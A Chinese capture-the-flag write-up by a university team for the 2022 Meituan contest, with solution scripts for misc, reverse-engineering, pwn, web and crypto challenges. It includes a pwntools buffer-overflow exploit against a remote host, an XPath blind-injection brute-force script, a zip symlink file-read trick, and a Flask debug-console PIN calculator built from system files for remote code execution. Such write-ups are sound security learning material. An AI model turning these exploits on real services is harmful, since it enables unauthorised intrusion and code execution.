2022美团网络安全高校挑战赛-HED-WriteUp
Rank: 19 1185pts 6Solved
HED 是南方科技大学COMPASS实验室的CTF战队
- 2022美团网络安全高校挑战赛-HED-WriteUp
- MISC
- CyberSpace(一血)
- RE
- RE-small
- PWN
- 捉迷藏
- WEB
- babyjava(一血)
- OnlineUnzip
- Crypto
- strange_rsa1
MISC
CyberSpace(一血)
~~题目出锅了,所以先品鉴了一下题目的源码。~~
队里的密码小姐姐是是信息竞赛选手,一眼就看出来这是单调队列入门题。
其中一种最优解是,在数列上升的时候进行上升数量的 add_l,在数列下降的时候进行下降数量的 add_r,这样相当于在 [add_l, add_r - 1] 区间中全部 +1。
令人感叹的是,这题修完重新上线的时候,小姐姐还在外面吃饭,回来以后竟然还是没有人做出来。为抢一血赶紧搓个脚本,交互都不写了,直接粘贴输入。
target = [83, 111, 54, 42, 72, 96, 111, 78, 33, 124, 50, 87, 119, 73, 42, 78, 83, 42, 97, 54, 39, 43, 121, 65]
target.append(0)
ans = []
l = []
cnt = 0
cur = 0
for i in range(len(target)):
if target[i] > cur:
cnt += target[i] - cur
l = l + [i for _ in range(target[i] - cur)]
elif target[i] < cur:
for _ in range(cur - target[i]):
ans.append((l[-1], i))
l.pop()
cur = target[i]
print(cnt, len(ans))
print()
for item in ans:
print('1')
print(item[0])
print(item[1])
Congratulations this is your flag
u8 b= 32 | 38 | 27 | 33 | 53 | 30 | 35 | 32 | 32 | 31 | 44 | 31 | 40 | 46 | 25 | 50 | 41 | 44 | 55
u8 a=[19]
u8 c=a+70
u8 flag=c+b
是 HeLang!
运行后得到 flag{different_xor}。
RE
RE-small
程序直接跑不起来,放IDA里从入口跟进,nop掉没用的花跳转,(其实不修也可以,但是找不到数据地址)
然后就能看到加密逻辑,没有魔改的原版TEA,轮数35,key硬编码。
还可以看到比较的数组,导出之后写解密脚本:
#include <stdio.h>
#include <iostream>
uint32_t dword_100F7[9] ={
-569872061,
-990307374,
-621356324,
1839125836,
1978355431,
1562237956,
1360728025,
1373407483,
0,
};
void decrypt(uint32_t* v) {
uint32_t round = 35;
uint32_t delta = 1732584193;
uint32_t v0 = v[0], v1 = v[1], sum = delta * round, i;
uint32_t k0 = 1, k1 = 35, k2 = 69, k3 = 103;
for (i = 0; i < round; i++) {
v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
sum -= delta;
}
v[0] = v0; v[1] = v1;
}
int main(){
for (int i = 0; i < 8; i += 2) {
decrypt(&dword_100F7[i]);
}
printf("%s\n", dword_100F7);
return 0;
}
PWN
捉迷藏
溢出点藏到一大堆分支的唯一结果里,不过过一遍27个getline就能找到溢出的位置。
之后想让angr自动跑出来,好像效果并不理想,于是考虑手动推算
结果发现比较函数有经典的漏洞,只要让用户输入为截断符就会返回通过,所以直接送一堆0进去,不过最后一个因为XOR了首位,所以需要等于亦或的值。
拿到溢出点之后ret到后门就可以了
from pwn import *
p=remote("39.106.27.2",36329)
p.sendafter(b"sbAmJLMLWm:", b"0 0 0 0 0 0 0 0 ")
p.sendafter(b"HuEqdjYtuWo:", b"\x00"*0x33)
p.sendafter(b"hbsoMdIRWpYRqvfClb:", b"\x00"*0x35)
p.sendafter(b"tfAxpqDQuTCyJw:", b"\x00"*0x22)
p.sendafter(b"UTxqmFvmLy:", b"0 0 0 9254 0 0 0 0 ")
p.sendafter(b"LLQPyLAOGJbnm:", b'\x3c'+b"\00"*0x29)
p.sendafter(b"gRGKqIlcuj:", b'a'*0xf+b'b'*8+p64(0x401331)*4)
p.interactive()
p.close()
WEB
babyjava(一血)
看大佬的博客:https://xz.aliyun.com/t/7791?page=1
前边的判断方法(root-user-username)博客里都有,而且是常见名爆破第一个字符就能猜到了
xpath=user1' and substring(name(/*[1]), 3, 1)='o' and ''='
最后注到第二个flag上脚本,很快就能出来
import requests
for n in range(80):
for i in "abcdef0123456789-{}":
r = requests.post("http://eci-2zef43pmhep3nhrjor7d.cloudeci1.ichunqiu.com:8888/hello",
data={
"xpath": f"""user1' and substring((//user[position()=1]/username[position()=2]),{n},1) = '{i}' and ''='"""
})
if "information " not in r.text:
print(i, end="")
break
OnlineUnzip
zip很容易构造../的文件名(比如手动patch或者丢给java生成),也很容易被开发者防到
软链接是另一种zip攻击的方法,解决方法是用修补过的unzip,但看起来这道题没修
这道题比较简单的方法是直接把/根目录ln出来,这样直接就能任意文件读,但读flag会提示无权限
然后注意到debug=True,但之前没做过Flask控制台的题,所以这里卡了两个多小时,痛失一血
开了debug之后不仅有报错,还可以通过/console进入控制台,当然高版本需要输入pin,但这个pin是可计算的
不过网上的脚本都不怎么能用,干脆把服务器的pin生成代码拉下来看看,然后再改,于是就有:
import hashlib
from itertools import chain
probably_public_bits = [
'ctf', # /etc/passwd
'flask.app', # 默认
'Flask', # 默认
'/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错或者想办法拿
]
# docker环境取 1 3 , 其余应该没有3
private_bits = [
'95529876171', # /sys/class/net/ens0/address
'96cec10d3d9307792745ec3b85c89620' # /etc/machine-id
# 'c5938f8f-1a6f-4e03-8a6e-4fed4f38afa9' # /proc/sys/kernel/random/boot_id
'e6714e8f0c24bf998ff3953127d9a0f60e30b712b0cda501c207092fd26bfc18' # /proc/self/cgroup
]
# 3.6是md5,3.8是sha1
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x: x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
print(rv)
有了pin就可以RCE了,没测控制台能不能直接读,反弹的shell可以读flag
Crypto
strange_rsa1
RSA,已知高精度下的 p/q,求 p 和 q。
用 sage 运行,发现精度足够,直接能解出来。
# exp.sage
from Crypto.Util.number import *
e = 0x10001
n = 108525167048069618588175976867846563247592681279699764935868571805537995466244621039138584734968186962015154069834228913223982840558626369903697856981515674800664445719963249384904839446749699482532818680540192673814671582032905573381188420997231842144989027400106624744146739238687818312012920530048166672413
c = 23970397560482326418544500895982564794681055333385186829686707802322923345863102521635786012870368948010933275558746273559080917607938457905967618777124428711098087525967347923209347190956512520350806766416108324895660243364661936801627882577951784569589707943966009295758316967368650512558923594173887431924
gift = 0.9878713210057139023298389025767652308503013961919282440169053652488565206963320721234736480911437918373201299590078678742136736290349578719187645145615363088975706222696090029443619975380433122746296316430693294386663490221891787292112964989501856435389725149610724585156154688515007983846599924478524442938
q_sq = n / gift
q_e = sqrt(q_sq)
q = int(q_e)
assert n % q == 0
p = n / q
phi = int((p-1)*(q-1))
d = inverse(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))